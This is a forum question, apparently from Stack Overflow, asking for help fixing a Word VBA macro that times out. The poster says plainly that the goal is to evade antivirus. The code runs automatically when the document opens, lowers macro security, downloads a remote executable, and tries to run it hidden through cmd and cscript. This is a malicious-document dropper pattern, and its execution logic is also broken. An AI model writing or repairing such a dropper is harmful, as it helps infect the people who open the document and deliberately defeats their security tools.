# VBA Operation timed Out

Tags: vba

My VBA code is not working properly as I do not know where the problem is coming from. I had a different code, but the code was been flagged by major antivirus and that was raising so much concerns for me.

I had a develop a new code that will run the program in memory thereby reducing the detection rate. But here is my problem. When I run the code, it will run to a point and terminates. Stating " The operation timed out". I have looked through the code without finding where the error is been generated from.

Below is the actual code

```
Sub AutoOpen()
    EnableMacros
    DownloadAndExecute
End Sub

Sub EnableMacros()
    Application.AutomationSecurity = msoAutomationSecurityLow
End Sub

Sub DownloadAndExecute()
    Dim url
    url = "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe"
    
    Dim http
    Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
    
    http.Open "GET", url, False
    http.Send
    
    Dim stream
    Set stream = CreateObject("ADODB.Stream")
    stream.Open
    stream.Type = 1 ' Binary data
    stream.Write http.ResponseBody
    stream.Position = 0 ' Reset stream position to the beginning
    
    Dim shell
    Set shell = CreateObject("WScript.Shell")
    shell.Run "cmd /c echo " & stream.ReadText & " | cscript //nologo", 0, True
    
    ' Clean up the objects
    Set stream = Nothing
    Set http = Nothing
    Set shell = Nothing
End Sub
```

The cscript allows it to run in memory which helps in reducing the actual detection rate

I have worked on the code to see if I can be able to resolve the error message, but it seems a bit too difficult for me. I need help

Comment: [Sockpuppet account](https://stackoverflow.com/questions/76431780/downloader-autdwnlrner-w97m-and-vba-heur-sdownloader-2-4e2ac9f2-gen-detected-on)?